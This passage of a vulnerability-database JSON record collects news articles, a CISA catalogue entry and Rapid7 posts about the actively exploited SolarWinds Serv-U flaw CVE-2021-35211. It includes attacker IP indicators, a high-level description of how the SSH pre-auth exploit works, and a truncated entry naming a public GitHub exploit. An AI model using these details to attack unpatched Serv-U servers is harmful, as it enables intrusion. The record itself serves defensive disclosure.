{"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-14T17:24:08", "id": "THN:05251A4D0E47381FEC6EC98D27F46C16", "href": "https://thehackernews.com/2021/07/chinese-hackers-exploit-latest.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:39:21", "description": "[![SolarWinds vulnerability](https://thehackernews.com/images/-xrVxmLD2g1c/YO0JK_DtgnI/AAAAAAAADKE/A8jsKUV1VfoaSivULzYY8fgaTL1LXIzaACLcBGAsYHQ/s728-e1000/solarwinds.jpg)](<https://thehackernews.com/images/-xrVxmLD2g1c/YO0JK_DtgnI/AAAAAAAADKE/A8jsKUV1VfoaSivULzYY8fgaTL1LXIzaACLcBGAsYHQ/s0/solarwinds.jpg>)\n\nSolarWinds, the Texas-based company that became the epicenter of a [massive supply chain attack](<https://thehackernews.com/2021/04/researchers-find-additional.html>) late last year, has issued patches to contain a remote code execution flaw in its Serv-U managed file transfer service.\n\nThe fixes, which target Serv-U Managed File Transfer and Serv-U Secure FTP products, arrive after Microsoft notified the IT management and remote monitoring software maker that the flaw was being exploited in the wild. The threat actor behind the exploitation remains unknown as yet, and it isn't clear exactly how the attack was carried out.\n\n\"Microsoft has provided evidence of limited, targeted customer impact, though SolarWinds does not currently have an estimate of how many customers may be directly affected by the vulnerability,\" SolarWinds [said](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>) in an advisory published Friday, adding it's \"unaware of the identity of the potentially affected customers.\"\n\nImpacting Serv-U versions 15.2.3 HF1 and before, a successful exploitation of the shortcoming ([CVE-2021-35211](<https://nvd.nist.gov/vuln/detail/CVE-2021-35211>)) could enable an adversary to run arbitrary code on the infected system, including the ability to install malicious programs and view, change, or delete sensitive data.\n\nAs indicators of compromise, the company is urging administrators to watch out for potentially suspicious connections via SSH from the IP addresses 98[.]176.196.89 and 68[.]235.178.32, or via TCP 443 from the IP address 208[.]113.35.58. Disabling SSH access on the Serv-U installation also prevents compromise.\n\nThe issue has been addressed in [Serv-U version 15.2.3 hotfix (HF) 2](<https://customerportal.solarwinds.com/>).\n\nSolarWinds also stressed in its advisory that the vulnerability is \"completely unrelated to the SUNBURST supply chain attack\" and that it does not affect other products, notably the Orion Platform, which was exploited to drop malware and dig deeper into the targeted networks by suspected Russian hackers to spy on multiple federal agencies and businesses in one of the most serious security breaches in U.S. history.\n\nA string of [software supply chain attacks](<https://thehackernews.com/2021/07/kaseya-releases-patches-for-flaws.html>) since then has highlighted the fragility of modern networks and the sophistication of threat actors to identify hard-to-find vulnerabilities in widely-used software to conduct espionage and drop ransomware, in which hackers shut down the systems of business and demand payment to allow them to regain control.\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-07-13T03:58:00", "type": "thn", "title": "A New Critical SolarWinds Zero-Day Vulnerability Under Active Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-14T03:18:35", "id": "THN:8636741FCF3A03B6238D8BAF1D9D00EB", "href": "https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-09-06T10:35:28", "description": "[![SolarWinds](https://thehackernews.com/images/-jSefSyaoEXg/YTMlSOpTaDI/AAAAAAAADuc/6tVl9cVHQocqXEvrp-hkyi73_VGjF59hgCLcBGAsYHQ/s728-e1000/SolarWinds.jpg)](<https://thehackernews.com/images/-jSefSyaoEXg/YTMlSOpTaDI/AAAAAAAADuc/6tVl9cVHQocqXEvrp-hkyi73_VGjF59hgCLcBGAsYHQ/s0/SolarWinds.jpg>)\n\nMicrosoft has shared technical details about a now-fixed, actively exploited critical security vulnerability affecting SolarWinds Serv-U managed file transfer service that it has attributed with \"high confidence\" to a threat actor operating out of China.\n\nIn mid-July, the Texas-based company [remedied](<https://thehackernews.com/2021/07/a-new-critical-solarwinds-zero-day.html>) a remote code execution flaw ([CVE-2021-35211](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>)) that was rooted in Serv-U's implementation of the Secure Shell (SSH) protocol, which could be abused by attackers to run arbitrary code on the infected system, including the ability to install malicious programs and view, change, or delete sensitive data.\n\n\"The Serv-U SSH server is subject to a pre-auth remote code execution vulnerability that can be easily and reliably exploited in the default configuration,\" Microsoft Offensive Research and Security Engineering team said in a [detailed write-up](<https://www.microsoft.com/security/blog/2021/09/02/a-deep-dive-into-the-solarwinds-serv-u-ssh-vulnerability/>) describing the exploit.\n\n\"An attacker can exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. When successfully exploited, the vulnerability could then allow the attacker to install or run programs, such as in the case of the targeted attack we previously reported,\" the researchers added.\n\nWhile Microsoft [linked](<https://thehackernews.com/2021/07/chinese-hackers-exploit-latest.html>) the attacks to DEV-0322, a China-based collective citing \"observed victimology, tactics, and procedures,\" the company has now revealed that the remote, pre-auth vulnerability stemmed from the manner the Serv-U process handled access violations without terminating the process, thereby making it simple to pull off stealthy, reliable exploitation attempts.\n\n[![](https://thehackernews.com/images/-mBVijrliiYs/YTMhBkqFg5I/AAAAAAAADuU/acCyK_NFBd0EK9Q7CZeW9acGcEZnZe-TQCLcBGAsYHQ/s0/code.jpg)](<https://thehackernews.com/images/-mBVijrliiYs/YTMhBkqFg5I/AAAAAAAADuU/acCyK_NFBd0EK9Q7CZeW9acGcEZnZe-TQCLcBGAsYHQ/s0/code.jpg>)\n\n\"The exploited vulnerability was caused by the way Serv-U initially created an OpenSSL AES128-CTR context,\" the researchers said. \"This, in turn, could allow the use of uninitialized data as a function pointer during the decryption of successive SSH messages.\"\n\n\"Therefore, an attacker could exploit this vulnerability by connecting to the open SSH port and sending a malformed pre-auth connection request. We also discovered that the attackers were likely using DLLs compiled without address space layout randomization (ASLR) loaded by the Serv-U process to facilitate exploitation,\" the researchers added.\n\nASLR refers to a [protection mechanism](<https://www.fireeye.com/blog/threat-research/2020/03/six-facts-about-address-space-layout-randomization-on-windows.html>) that's used to increase the difficulty of performing a buffer overflow attack by randomly arranging the address space positions where system executables are loaded into memory.\n\nMicrosoft, which reported the vulnerability to SolarWinds, said it recommended [enabling ASLR compatibility](<https://docs.microsoft.com/en-us/cpp/build/reference/dynamicbase-use-address-space-layout-randomization?view=msvc-160>) for all binaries loaded in the Serv-U process. \"ASLR is a critical security mitigation for services which are exposed to untrusted remote inputs, and requires that all binaries in the process are compatible in order to be effective at preventing attackers from using hardcoded addresses in their exploits, as was possible in Serv-U,\" the researchers said.\n\nIf anything, the revelations highlight the variety of techniques and tools used by threat actors to breach corporate networks, including piggybacking on legitimate software.\n\nAlthough the SolarWinds supply chain attacks have been formally pinned on Russian APT29 hackers, Microsoft in December 2020 disclosed that a [separate espionage group](<https://thehackernews.com/2020/12/a-second-hacker-group-may-have-also.html>) may have been taking advantage of the IT infrastructure provider's Orion software to drop a persistent backdoor called Supernova on infected systems. Cybersecurity firm Secureworks connected the intrusions to a China-linked threat actor called [Spiral](<https://thehackernews.com/2021/03/solarwinds-hack-new-evidence-suggests.html>).\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-09-04T07:50:00", "type": "thn", "title": "Microsoft Says Chinese Hackers Were Behind SolarWinds Serv-U SSH 0-Day Attack", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-09-06T10:12:29", "id": "THN:D84F06239D4B68B06712C485E00D6D1F", "href": "https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-05-09T12:37:41", "description": "[![](https://thehackernews.com/new-images/img/a/AVvXsEiPQG1pOGrj0S2b6yg5RN1JCq-IOfI8Pwjmx7-7G2hM_z7iFpFEH5TyTMPgwBtVodFhbeAKPveoF-vCGP69dhLcDcmKRT2Orh6vOk-xqaQlijHze0KKXB0Z07lp1PpajQf7_4d88LSK5McgppRxvCj4XMvIkvxTxGikMr4WhBnVRn1df0J2llcW6fAu)](<https://thehackernews.com/new-images/img/a/AVvXsEiPQG1pOGrj0S2b6yg5RN1JCq-IOfI8Pwjmx7-7G2hM_z7iFpFEH5TyTMPgwBtVodFhbeAKPveoF-vCGP69dhLcDcmKRT2Orh6vOk-xqaQlijHze0KKXB0Z07lp1PpajQf7_4d88LSK5McgppRxvCj4XMvIkvxTxGikMr4WhBnVRn1df0J2llcW6fAu>)\n\nMicrosoft on Wednesday disclosed details of a new security vulnerability in SolarWinds Serv-U software that it said was being weaponized by threat actors to propagate attacks leveraging the Log4j flaws to compromise targets.\n\nTracked as [CVE-2021-35247](<https://nvd.nist.gov/vuln/detail/CVE-2021-35247>) (CVSS score: 5.3), the issue is an \"input validation vulnerability that could allow attackers to build a query given some input and send that query over the network without sanitation,\" Microsoft Threat Intelligence Center (MSTIC) [said](<https://www.microsoft.com/security/blog/2021/12/11/guidance-for-preventing-detecting-and-hunting-for-cve-2021-44228-log4j-2-exploitation/#CVE-2021-35247>).\n\nThe flaw, which was discovered by security researcher Jonathan Bar Or, affects Serv-U versions 15.2.5 and prior, and has been addressed in Serv-U version 15.3.\n\n\"The Serv-U web login screen to LDAP authentication was allowing characters that were not sufficiently sanitized,\" SolarWinds [said](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35247>) in an advisory, adding it \"updated the input mechanism to perform additional validation and sanitization.\"\n\nThe IT management software maker also pointed out that \"no downstream effect has been detected as the LDAP servers ignored improper characters.\" It's not immediately clear if the attacks detected by Microsoft were mere attempts to exploit the flaw or if they were ultimately successful.\n\n[![Log4j Attacks](https://thehackernews.com/new-images/img/a/AVvXsEi5M2JItG9gq0ToGqTBs3NVVCDWbgi66iooG7nUw5ULlOefSmalsLcX_kO8aUUZkfkRtrtBROr6e9eVGvuwqO-j6gm2DBIkF--EdS0b0kWuL7RRkA33zflcbxki1TEj-RRo9DFwW-MNMCUp2bfMO38ryaK_FXWqhDyFEd-EjtG7NSGpsYYGaKOuqoK2=s728-e1000)](<https://thehackernews.com/new-images/img/a/AVvXsEi5M2JItG9gq0ToGqTBs3NVVCDWbgi66iooG7nUw5ULlOefSmalsLcX_kO8aUUZkfkRtrtBROr6e9eVGvuwqO-j6gm2DBIkF--EdS0b0kWuL7RRkA33zflcbxki1TEj-RRo9DFwW-MNMCUp2bfMO38ryaK_FXWqhDyFEd-EjtG7NSGpsYYGaKOuqoK2>)\n\nThe development comes as multiple threat actors continue to take advantage of the [Log4Shell flaws](<https://thehackernews.com/2022/01/iranian-hackers-exploit-log4j.html>) to mass scan and infiltrate vulnerable networks for deploying backdoors, coin miners, ransomware, and remote shells that grant persistent access for further post-exploitation activity.\n\nAkamai researchers, in an [analysis](<https://www.akamai.com/blog/security/mirai-botnet-abusing-log4j-vulnerability>) published this week, also found evidence of the flaws being abused to infect and assist in the proliferation of malware used by the Mirai botnet by targeting [Zyxel networking devices](<https://www.zyxel.com/us/en/support/Zyxel_security_advisory_for_Apache_Log4j_RCE_vulnerability.shtml>).\n\nOn top of this, a China-based hacking group has been previously observed exploiting a critical security vulnerability affecting SolarWinds Serv-U ([CVE-2021-35211](<https://thehackernews.com/2021/09/microsoft-says-chinese-hackers-were.html>)) to install malicious programs on the infected machines.\n\n**_Update:_** In a statement shared with The Hacker News, SolarWinds pointed out that its Serv-U software wasn't exploited in the Log4j attacks, and that attempts were made to log in to SolarWinds Serv-U file-sharing software via attacks exploiting the Log4j flaws.\n\n\"The activity Microsoft was referring to in their report was related to a threat actor attempting to login to Serv-U using the Log4j vulnerability but that attempt failed as Serv-U does not utilize Log4j code and the target for authentication LDAP (Microsoft Active Directory) is not susceptible to Log4J attacks,\" a company spokesperson said.\n\nWhile this directly contradicts Microsoft's original disclosure that attackers were exploiting the previously undisclosed vulnerability in the SolarWinds Serv-U managed file transfer service to propagate Log4j attacks, the attempts ultimately failed because the vulnerable Log4j code isn't present in the software.\n\n_(The story has been revised to to clarify that Serv-U is not vulnerable to the Log4Shell attacks.)_\n\n \n\n\nFound this article interesting? Follow THN on [Facebook](<https://www.facebook.com/thehackernews>), [Twitter _\uf099_](<https://twitter.com/thehackersnews>) and [LinkedIn](<https://www.linkedin.com/company/thehackernews/>) to read more exclusive content we post.\n", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-20T04:57:00", "type": "thn", "title": "Hackers Attempt to Exploit New SolarWinds Serv-U Bug in Log4Shell Attacks", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211", "CVE-2021-35247", "CVE-2021-44228"], "modified": "2022-01-23T06:42:28", "id": "THN:83D31EE6B3E59778D812B3B7E67D7CD6", "href": "https://thehackernews.com/2022/01/microsoft-hackers-exploiting-new.html", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "cisa_kev": [{"lastseen": "2022-08-10T17:26:47", "description": "Microsoft discovered a remote code execution (RCE) vulnerability in the SolarWinds Serv-U product utilizing a Remote Memory Escape Vulnerability.", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2021-11-03T00:00:00", "type": "cisa_kev", "title": "SolarWinds Serv-U Remote Memory Escape Vulnerability", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2021-11-03T00:00:00", "id": "CISA-KEV-CVE-2021-35211", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "rapid7blog": [{"lastseen": "2021-07-12T22:56:36", "description": "![SolarWinds Serv-U FTP and Managed File Transfer CVE-2021-35211: What You Need to Know](https://blog.rapid7.com/content/images/2021/07/rapid7-og-1.jpg)\n\nOn July 12, 2021, SolarWinds confirmed an actively exploited zero-day vulnerability, CVE-2021-35211, in the Serv-U FTP and Managed File Transfer component of SolarWinds15.2.3 HF1 (released May 5, 2021) and all prior versions. Successful exploitation of CVE-2021-35211 could enable an attacker to gain remote code execution on a vulnerable target system. The vulnerability only exists when SSH is enabled in the Serv-U environment.\n\nA [hotfix for the vulnerability is available](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>), and **we recommend all customers of SolarWinds Serv-U FTP and Managed File Transfer install this hotfix immediately** (or, at minimum, disable SSH for a temporary mitigation). SolarWinds has emphasized that CVE-2021-35211 only affects Serv-U Managed File Transfer and Serv-U Secure FTP and does not affect any other SolarWinds or N-able (formerly SolarWinds MSP) products. For further details, see [SolarWinds\u2019s advisory](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211>).\n\n## Details\n\nThe SolarWinds advisory cites threat intelligence provided by Microsoft. According to Microsoft, a single threat actor unrelated to this year\u2019s earlier [SUNBURST intrusions](<https://www.rapid7.com/blog/post/2020/12/14/solarwinds-sunburst-backdoor-supply-chain-attack-what-you-need-to-know/>) has exploited the vulnerability against a limited, targeted population of SolarWinds customers. The vulnerability exists in all versions of Serv-U 15.2.3 HF1 and earlier. Though Microsoft provided a proof-of-concept exploit to SolarWinds, there are no public proofs-of-concept as of July 12, 2021.\n\nThe vulnerability appears to be in the exception handling functionality in a portion of the software related to processing connections on open sockets. Successful exploitation of the vulnerability will cause the Serv-U product to throw an exception, then will overwrite the exception handler with the attacker\u2019s code, causing remote code execution.\n\n## Detection\n\nSince the vulnerability is in the exception handler, looking for exceptions in the `DebugSocketLog.txt` file may help identify exploitation attempts. Note, however, that exceptions can be thrown for many reasons and the presence of an exception in the log does not guarantee that there has been an exploitation attempt.\n\nIP addresses used by the threat actor include:\n \n \n 98.176.196.89 \n 68.235.178.32 \n 208.113.35.58\n \n\nRapid7 does not use SolarWinds Serv-U FTP products anywhere in our environment and is not affected by CVE-2021-35211.\n\nFor further information, see [Solarwinds\u2019s FAQ here](<https://www.solarwinds.com/trust-center/security-advisories/cve-2021-35211#FAQ>).", "cvss3": {}, "published": "2021-07-12T22:39:41", "type": "rapid7blog", "title": "SolarWinds Serv-U FTP and Managed File Transfer CVE-2021-35211: What You Need to Know", "bulletinFamily": "info", "cvss2": {}, "cvelist": ["CVE-2021-35211"], "modified": "2021-07-12T22:39:41", "id": "RAPID7BLOG:BA6A91F3A0B22C1BFF0C8A73D90FB362", "href": "https://blog.rapid7.com/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2021-10-08T15:44:47", "description": "![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/insightvm-q3.jpg)\n\nIn today's post, we're giving a rundown of new features and functionality launched in Q3 2021 for [InsightVM](<https://www.rapid7.com/products/insightvm/>) and the [Insight Platform](<https://www.rapid7.com/products/insight-platform/>). We hope you can begin to leverage these changes to drive success across your organization.\n\n## Apple Silicon support on the Insight Agent\n\nWe're excited to announce that the Insight Agent now natively supports Apple Silicon chips!\n\nApple announced the first generation Apple Silicon chip \u2014 the M1 processor \u2014 in November 2020. This chip is the new standard on all MacBooks starting with the 2020 releases, and Apple plans to transition completely to Apple Silicon chips over the next two years.\n\nThe new Mac installer specifically designed for the Apple Silicon can be accessed right from Agent Management in the platform, in the download section. Learn more in our [Apple Silicon Agent Support blog post](<https://www.rapid7.com/blog/post/2021/07/08/apple-m1-support-on-insight-agent/>).\n\n![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-1.png)\n\n## Asset and Vulnerability Details reports\n\nThis new feature allows you to easily communicate details of your assets and vulnerabilities with stakeholders in a PDF format. Simply click the ****Export to PDF ****button on the Vulnerability Details page, and you'll have a PDF ready to share!\n\n![What's New in InsightVM: Q3 2021 in Review](https://blog.rapid7.com/content/images/2021/10/vm-screenshot-2.png)\n\nThis is particularly useful if you're attempting to collaborate while remediating a specific vulnerability. We'll use a hypothetical security engineer named Jane to illustrate this.\n\nJane recently read about a new ransomware strain that leverages a specific vulnerability as part of an attack chain that seems to be targeting the industry of her organization. She opens the query builder in InsightVM, constructs a search query to identify the vulnerability by CVE, and discovers several instances. She wants to mention this during her morning all-hands sync so she can recruit other team members to her effort. She exports the vulnerability details page to a PDF, which allows her to share this out and provide more details to interested team members, who then can help her remediate this vulnerability much more quickly.\n\nMoreover, while undertaking this effort, another team member \u2014 Bill \u2014 finds an asset that seems to be a complete tragedy in terms of patching and vulnerability prevalence. He creates the Asset Details report and shares this in an e-mail to his team, stating that this asset seems to be missing their organization's patch cycle. He also suggests that they look for more of these types of assets because he knows that when there is one offender, there are often many.\n\n## Snyk integration for reporting vulnerabilities\n\nContainer Security assessments will now report Ruby vulnerabilities through an integration with the Snyk vulnerability database. This adds RubyGems packages to our Snyk-based coverage, which currently includes vulnerability detections for Java, JavaScript, and Python libraries. This integration is particularly helpful for organizations that perform scanning of Container Images at rest, in both public and private registries.\n\n## Emergent threat coverage recap\n\nQ3 2021 was another busy quarter for high-priority cybersecurity threats. As part of our emergent threat response process, Rapid7's VRM research and engineering teams released vulnerability checks and in-depth technical analysis to help InsightVM customers understand the risk of exploitation and assess their exposure to critical security threats. In July, [CVE-2021-34527](<https://attackerkb.com/topics/MIHLz4sY3s/cve-2021-34527-printnightmare/rapid7-analysis?referrer=blog>), dubbed \u201c[PrintNightmare](<https://www.rapid7.com/blog/post/2021/06/30/cve-2021-1675-printnightmare-patch-does-not-remediate-vulnerability/>)\" presented remediation challenges for many organizations amid active exploitation of the Windows Print Spooler service. In August, the [ProxyShell](<https://attackerkb.com/topics/xbr3tcCFT3/proxyshell-exploit-chain/rapid7-analysis?referrer=blog>) exploit chain put on-premises instances of Microsoft Exchange Server [at risk](<https://www.rapid7.com/blog/post/2021/08/12/proxyshell-more-widespread-exploitation-of-microsoft-exchange-servers/>) for remote code execution. More recently, widespread attacks took advantage of [CVE-2021-26084](<https://attackerkb.com/topics/Eu74wdMbEL/cve-2021-26084-confluence-server-ognl-injection/rapid7-analysis?referrer=blog>), a critical flaw in[ Confluence Server & Confluence Data Center](<https://www.rapid7.com/blog/post/2021/09/02/active-exploitation-of-confluence-server-cve-2021-26084/>), to deploy cryptominers, exfiltrate data, and obtain initial access for ransomware operations.\n\nOther notable emergent threats included:\n\n * [ForgeRock Access Manager/OpenAM Pre-Auth Remote Code Execution Vulnerability (CVE-2021-35464)](<https://attackerkb.com/topics/KnAX5kffui/pre-auth-rce-in-forgerock-access-manager-cve-2021-35464/rapid7-analysis?referrer=blog>)\n * [SolarWinds Serv-U FTP and Managed File Transfer (CVE-2021-35211)](<https://www.rapid7.com/blog/post/2021/07/12/solarwinds-serv-u-ftp-and-managed-file-transfer-cve-2021-35211-what-you-need-to-know/>)\n * [Microsoft SAM File Readability (CVE-2021-36934)](<https://www.rapid7.com/blog/post/2021/07/21/microsoft-sam-file-readability-cve-2021-36934-what-you-need-to-know/>)\n * [PetitPotam: Novel Attack Chain](<https://www.rapid7.com/blog/post/2021/08/03/petitpotam-novel-attack-chain-can-fully-compromise-windows-domains-running-ad-cs/>)\n * [Zoho ManageEngine ADSelfService Plus (CVE-2021-40539)](<https://attackerkb.com/topics/DMSNq5zgcW/cve-2021-40539/rapid7-analysis?referrer=blog>)\n * [Critical vCenter Server File Upload Vulnerability (CVE-2021-22005)](<https://www.rapid7.com/blog/post/2021/09/21/critical-vcenter-server-file-upload-vulnerability-cve-2021-22005/>)\n\n## Stay tuned!\n\nAs always, we're continuing to work on exciting product enhancements and releases throughout the year. Keep an eye on our blog and [release notes](<https://docs.rapid7.com/release-notes/insightvm/>) as we continue to highlight the latest in vulnerability management at Rapid7.\n\n#### NEVER MISS A BLOG\n\nGet the latest stories, expertise, and news about security today.\n\nSubscribe", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 10.0, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 6.0}, "published": "2021-10-08T13:30:00", "type": "rapid7blog", "title": "What's New in InsightVM: Q3 2021 in Review", "bulletinFamily": "info", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 10.0, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-1675", "CVE-2021-22005", "CVE-2021-26084", "CVE-2021-34527", "CVE-2021-35211", "CVE-2021-35464", "CVE-2021-36934", "CVE-2021-40539"], "modified": "2021-10-08T13:30:00", "id": "RAPID7BLOG:8882BFA669B38BCF7B5A8A26F657F735", "href": "https://blog.rapid7.com/2021/10/08/whats-new-in-insightvm-q3-2021-in-review/", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "githubexploit": [{"lastseen": "2022-07-26T10:16:52", "description": "# Serv-U CVE-2021-35211 Exploit\n\n## Potential for DoS - check yo...", "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "CHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "privilegesRequired": "NONE", "baseScore": 10.0, "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H", "version": "3.1", "userInteraction": "NONE"}, "impactScore": 6.0}, "published": "2022-01-14T05:52:17", "type": "githubexploit", "title": "Exploit for Vulnerability in Solarwinds Serv-U", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "COMPLETE", "availabilityImpact": "COMPLETE", "integrityImpact": "COMPLETE", "baseScore": 10.0, "vectorString": "AV:N/AC:L/Au:N/C:C/I:C/A:C", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 10.0, "acInsufInfo": false, "obtainUserPrivilege": false}, "cvelist": ["CVE-2021-35211"], "modified": "2022-07-26T06:42:23", "id": "15CF4822-F1E8-5BDB-8E65-8FC88F816E1E", "href": "", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}, "privateArea": 1}], "mssecure": [{"lastseen": "2021-07-27T08:07:52", "description": "Microsoft has detected a 0-day remote code execution exploit being used to attack SolarWinds Serv-U FTP software in limited and targeted attacks. The Microsoft Threat Intelligence Center (MSTIC) attributes this campaign with high confidence to DEV-0322, a group operating out of China, based on observed victimology, tactics, and procedures.\n\nThe vulnerability being exploited is CVE-2021-35211, which was [recently patched by 